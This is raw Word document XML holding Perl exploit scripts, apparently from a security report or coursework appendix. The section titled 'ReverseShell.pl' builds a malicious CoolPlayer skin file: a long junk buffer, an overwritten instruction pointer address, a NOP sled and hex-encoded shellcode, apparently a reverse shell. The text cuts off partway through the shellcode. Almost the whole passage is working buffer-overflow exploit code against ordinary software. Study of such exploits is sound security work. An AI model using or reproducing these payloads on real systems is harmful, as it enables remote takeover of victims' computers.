        <w:t>"\x42\x50\x53\x36\x31\x50\x52\x4b\x4f\x4e\x30\x50\x31\x4f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5DC76451" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x30\x36\x30\x4b\x4f\x56\x35\x35\x58\x41\x41</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4560645F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF76E66" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38530962" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>start.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>junk1.$eip.$nop.$shellcode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649BD5A2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>close($FILE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="495F8A4F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7149C619" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Ref71481772"/>
      <w:bookmarkStart w:id="89" w:name="_Toc71564025"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ReverseShell.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="36419F46" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $file= "Reverseshell.ini</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E881361" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $start="[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CoolPlayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Skin]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C26A4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PlaylistSkin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B43101D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">my $junk1 = "\x41" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1051;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26CDD44C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = pack('V',0x7C86467B</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41561E15" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "\x90" x </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>60;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1FCCE77E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>my $shellcode =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D99AC7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"\x2b\xc9\x83\xe9\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe8\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xc0\x5e\x81\x76</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41137B24" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x0e\x1c\x22\x92\xb7\x83\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe2\xf4\xe0\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x10\xb7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2367EC6C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x1c\x22\xf2\x3e\xf9\x13\x52\xd3\x97\x72\xa2\x3c\x4e\x2e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64E5A4A1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x19\xe5\x08\xa9\xe0\x9f\x13\x95\xd8\x91\x2d\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x3e\x8b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58E99392" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x7d\x5e\x90\x9b\x3c\xe3\x5d\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x1d\xe5\x70\x45\x4e\x75</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13CF3523" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x19\xe5\x0c\xa9\xd8\x8b\x97\x6e\x83\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x6a\x93\x66</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F36452D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4d\xa9\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x97\x1d\xf1\x19\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x04\xc1\xa8\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x97\x16</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30089170" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x19\xb6\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x13\x6d\x1b\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x9f\xb6\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x1a\x72\xc2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="53C0311B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x21\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x4f\x27\x5f\xb6\xc2\xf8\x7a\x19\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x38\x23</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F28B439" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x41\xd1\x97\x2e\xd9\x3c\x44\x3e\x93\x64\x97\x26\x19\xb6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2796B943" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xd6\x93\x38\x79\xc9\xd6\x45\x78\xc3\x48\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x7d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C4E0EEA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x97\x30\x79\x3a\x41\x4a\xa1\x85\x1c\x22\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xc0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="399EFD1A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x6f\x10\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xe3\x74\x6e\xe5\x91\x1b\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x47\x0f\x8c\x23</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23609CF9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x92\xb7\x35\xe6\xc6\xe7\x74\x0b\x12\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x1c\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x47\xe7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C72BDB8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4c\x72\xc2\xf7\x4c\x62\xc2\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\xf6\x2d\x4d\x57\xe3\xf7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68E51DB3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x05\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>\x19\x4a\x52\x1f\x1e\x34\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>xfa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
